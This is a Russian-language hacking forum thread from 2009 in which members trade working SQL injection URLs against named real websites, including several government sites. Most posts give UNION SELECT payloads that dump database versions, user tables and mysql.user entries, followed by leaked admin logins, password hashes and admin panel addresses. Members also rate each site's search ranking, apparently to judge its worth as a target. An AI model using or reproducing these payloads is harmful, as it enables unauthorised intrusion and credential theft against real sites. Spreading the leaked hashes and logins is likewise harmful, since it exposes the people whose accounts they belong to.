19.02.2009, 16:04
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
Код:
http://www.ttfinance.ru/news.php?id=-4346%20union%20select%20group_concat(table_name)%20from%20information_schema.t
ables--
(все таблцы, смотреть исходный код)
Код:
http://www.ttfinance.ru/news.php?id=-4346%20union%20select%20concat_ws(0x3a,ID,username,realname,email,password)%20
from%20mantis_user_table--
(Админские данные)
Код:
http://www.ttfinance.ru/admin.php
(Админка)
1:administrator::im@tt-agency.ru:074eec0da3d9dcc8e6e8df8cfe566050 (расшифровать не смог)
PR=5
ТиЦ=200
Rubaka, спс репу позже поставлю, щас не могу =) |
|
|
19.02.2009, 19:12
|
|
Познающий
Регистрация: 25.04.2008
Сообщений: 43
С нами:
9496707
Репутация:
54
|
|
http://clubinfo.news.at/xxx.php?id_loc=99999999+union+select+1,2,3,4,conca t(nick,char(58),pw),6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26+from+adminuser/*
http://www.light-inc.com/news.php?$pn=30&$catid=99999+union+select+1,2,vers ion()/*
4.1.22-standard
http://pacificretail.com/news.php?catID=9999+union+select+1,2,version(),4,5 ,6,7,8/*
4.0.27-standard
|
|
|
|
19.02.2009, 21:16
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
http://products.weather.gov/detail.php?selrow=5798798695443+union+select+conca t_ws(0x3a,version(),user(),database()),2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49--
Version: 5.0.45
User: mtsmith@localhost
Database: PDD
http://products.weather.gov/detail.php?selrow=5798798695443+union+select+conca t_ws(0x3a,user,password),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49+from+mysql.user--
root : 248c0cc52235aa89
|
|
|
|
19.02.2009, 21:23
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
С нами:
9314306
Репутация:
325
|
|
goxgo.ca - PR6
Код:
http://www.goxgo.ca/article.php?nid=-483+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8--
Админка:
Код:
http://www.goxgo.ca/admin/
Логин и пароль не знаем, поправим ситуацию:
Код:
http://www.goxgo.ca/article.php?nid=-483+UNION+SELECT+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+FROM+user--
Вот уже есть логин и пасс:
krista_mckenna:4c1ccfb29d89aaa4746cf7dfb40a28ce
================================================== ==============================
findmespot.ca - PR4
Код:
http://findmespot.ca/en/index.php?cid=-1110+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user(),database(),version())/*
DB_User:webuser@localhost
DB:Web_SPOT_GCAN
DB_Ver:4.0.20-standard
Достаем пользователя из mysql.user
Код:
http://findmespot.ca/en/index.php?cid=-1110+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user,password)+from+mysql.user/*
root:67c4db4730111611
и так далее =)
Извиняйте за боян maineservicecommission.gov... надо было быть повнимательнее и перепроверить =\
Последний раз редактировалось Kraneg; 19.02.2009 в 22:52..
|
|
|
|
19.02.2009, 23:12
|
|
Новичок
Регистрация: 19.01.2009
Сообщений: 2
С нами:
9109898
Репутация:
5
|
|
Код:
http://www.ldk.gr/expertise.php?id=1++union+select+null,null,null,concat_ws(0x20,user(),database(),version()),null/*
ldk_gr@localhost ldk_gr 5.0.22-log |
|
|
|
19.02.2009, 23:47
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Код:
http://stefanboulter.com/single.php?id=-82+union+select+1,2,3,version(),5,6,7,8,9--
5.0.67-log |
|
|
|
20.02.2009, 00:47
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
Код:
http://www.argued.ru
PR: 4
Тиц: 10
Версия: 5.0.67-log
База данных: u29980
Юзверь: u29980@10.10.153.164
Код:
http://www.argued.ru/news.php?id=-1%20union%20select%201,2,concat_ws(0x3a,LOGIN,PASSWORD),4,5,6,7,8,9,10,11,12%20from%20b_user%20--
Админка: http://argued.ru/admin/
Логин: andreygu
Пароль: e0067c761726972b3f473cdef6313fd9
Ох как клево через мою прогу все делать =) |
|
|
|
20.02.2009, 00:59
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
http://www.phoenixnorthern.co.uk/display.php?pageid=5/**/UNION/**/SELECT/**/1,user(),3,version(),5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21/*
phoenix@localhost
4.1.22
|
|
|
|
20.02.2009, 01:04
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами:
9129884
Репутация:
240
|
|
http://post.gov.bn/news_arc.php?newsid=10+union+select+1,version(),3, 4+limit+1,1/*
Version: 5.0.24a-standard-log
User: webadmin@192.168.1.206
Database: test
http://www.bridgeportct.gov/_admin/news_detail.php?newsID=258+union+select+1,2,versio n(),4,5+limit+1,1/*
Version: 5.0.41-community-nt-log
User:admin@localhost
Database: bridgeport
Последний раз редактировалось jokester; 20.02.2009 в 02:44..
Причина: congress.gov.ph БОЯН
|
|
|
|
20.02.2009, 02:18
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
ПР:4
Код:
http://www.wilsonelectronics.com/ViewProduct.php?ID=-123+union+select+1,2,3,4,concat(username,0x3a,userpwd),6,7,8,9,10,11,12,13,14,15,16,17,18+from+siteusers+--+
логин/пасс:
Код:
wilson:c23bde412afe8fd7cf234c9b4cb208a2
---------------------------------------------------------------------
The End!
Последний раз редактировалось jokester; 20.02.2009 в 02:47..
Причина: v-vid.ru и bestbets.org БОЯН
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
